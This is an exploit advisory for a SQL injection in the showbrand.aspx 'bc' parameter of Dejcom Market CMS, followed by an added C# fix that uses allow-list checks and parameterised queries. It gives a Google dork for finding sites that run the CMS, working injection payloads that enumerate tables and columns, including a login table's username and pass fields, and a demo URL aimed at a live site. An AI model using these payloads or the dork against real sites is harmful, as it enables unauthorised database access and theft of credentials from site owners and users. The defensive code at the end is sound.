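Author: Mormoroth
Affected versions: ALL Version
Vulnerability type: SQL injection
Description: The parameter of the showbrand.aspx page in Dejcom Market CMS is not strictly filtered, which results in a SQL injection vulnerability.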
Dork : "Powered By Dejcom Market CMS"
Exploit:
%27 or 1=(select top 1 table_name from information_schema.tables where table_name not in(bill,billdetail,cart,charge,COMMENTS,filegroup,files,groups,khabarname,khat,links,login))--
showbrand.aspx?bc=%27 or 1=(select top 1 column_name from information_schema.columns where table_name=loguser and column_name not in(code,username,pass))--
Demo : http://www.2cto.com /showbrand.aspx?bc=%27 or 1=(select top 1 table_name from information_schema.tables where table_name not in(bill,billdetail,cart,charge))--
Fix:
Strictly filter the parameter of the showbrand.aspx page.
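One way to apply this fix in the page's data-access code, as an added example that is not Dejcom's own code: the `bc` value is checked against an allow-list and then bound as a parameter, so it is never parsed as SQL text. The table and column names (`brands`, `brand_code`, `brand_id`, `brand_name`), the brand-code format and the class name `BrandLookup` are assumptions for illustration.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Text.RegularExpressions;

public static class BrandLookup
{
    // Assumption: brand codes are short tokens of letters, digits, '_' or '-'.
    // \A and \z anchor the whole string, so a trailing newline cannot slip through.
    private static readonly Regex BrandCode =
        new Regex(@"\A[A-Za-z0-9_-]{1,32}\z", RegexOptions.CultureInvariant);

    // Returns true only when the raw query-string value matches the allow-list.
    public static bool TryParseBrandCode(string raw, out string code)
    {
        code = null;
        if (raw == null || !BrandCode.IsMatch(raw))
            return false;
        code = raw;
        return true;
    }

    // rawBc is Request.QueryString["bc"] as received by showbrand.aspx.
    public static DataTable LoadBrand(string connectionString, string rawBc)
    {
        string code;
        if (!TryParseBrandCode(rawBc, out code))
            throw new ArgumentException("invalid brand code");

        // Hypothetical schema; the statement text is constant and contains
        // no user input. The value travels separately as @bc.
        const string sql =
            "SELECT brand_id, brand_name FROM brands WHERE brand_code = @bc";

        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@bc", SqlDbType.NVarChar, 32).Value = code;

            var table = new DataTable();
            using (var adapter = new SqlDataAdapter(cmd))
            {
                adapter.Fill(table); // Fill opens and closes the connection itself
            }
            return table;
        }
    }
}
```

The parameter binding is what closes the injection; the allow-list rejects malformed input before it reaches the database.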